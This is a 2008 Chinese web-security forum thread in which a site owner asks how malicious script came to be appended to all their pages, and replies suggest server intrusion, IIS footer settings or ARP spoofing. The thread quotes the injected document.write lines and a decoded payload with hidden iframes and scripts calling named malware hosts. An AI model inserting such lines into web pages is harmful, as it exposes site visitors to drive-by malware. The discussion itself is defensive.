lizurj

Rank: 1

帖子: 2
精华: 0
积分: 12
威望: 12
金钱: 12
在线时间: 0 小时

1^# 跳转到 » 倒序看帖

打印

字体大小: tT

发表于 2008-6-7 00:51 | 只看该作者

请高手帮忙解释一下这种马是如何挂上的，谢谢

我的站刚才被人挂马，在我所有站的每个页面的最后都出多出了一行代码

document.write('<script src=http://51uuip.cn/uu/uuip1.png></script>');

复制代码

比如，我的的0506.html这个页的最后就多出来这样一段，但是我用　FTP把服务器上这个0506.html下载下来，却发现该文件里并没有这段代码，也就是说，这段代码只有用浏览器访问时才会被加上，麻烦高手们帮忙解释一下这个是如何实现的。
是不是服务器出了问题？？

lizurj

服安新手

Rank: 1

帖子: 2
精华: 0
积分: 12
威望: 12
金钱: 12
在线时间: 0 小时

2^#

发表于 2008-6-7 00:53 | 只看该作者

天色太晚了，没人了。。。。。

TOP

小胖子

超级版主

Rank: 8 Rank: 8

帖子: 242
精华: 0
积分: 61
威望: 61
金钱: 45
来自: 北京
在线时间: 5 小时

3^#

发表于 2008-6-7 08:49 | 只看该作者

你的服务器应该被入侵了，你检查一下IIS的页脚设置和是不是被ARP了，都有可能出现你的说的那种情况的。
被插入页脚的可能性较大。

不要让生活磨灭我的性格！

TOP

firefox

斑竹

Rank: 7 Rank: 7 Rank: 7

帖子: 433
精华: 4
积分: 2842
威望: 2842
金钱: 4710
在线时间: 360 小时

4^#

发表于 2008-6-11 22:18 | 只看该作者

网站有漏洞，服务器有漏洞，甚至于服务器被ARP欺骗攻击
均有可能被插入脚本....

具体问题具体分析，有时代码在网页中，有时也可能被插入到数据库...

TOP

mgmg

服安新手

Rank: 1

帖子: 1
精华: 0
积分: 11
威望: 11
金钱: 11
在线时间: 20 小时

5^#

发表于 2008-6-12 11:43 | 只看该作者

这个是常见的JS挂马，你检查文件中是不是有这个类似的代码
“<script language=javascript src=XXXX.js></script>”

查看XXXX.js文件，里面有这样的代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");

http://51uuip.cn/uu/uuip1.png

复制代码

是做这样的解析：

document.write('<iframe src=http://mm.1d1d1d.com/rx/ingdfa01/new09.htm width=1 height=1></iframe>');document.write ('<script language="javascript" type="text/javascript" src="http://51uuip.cn/uu/tj.png"></script>');

http://mm.1d1d1d.com/rx/ingdfa01/new09.htm 是网页木马的地址。

你找到xxxx.js。删除相关代码就可以了。

[ 本帖最后由 mgmg 于 2008-6-12 12:03 编辑 ]

TOP

小屁孩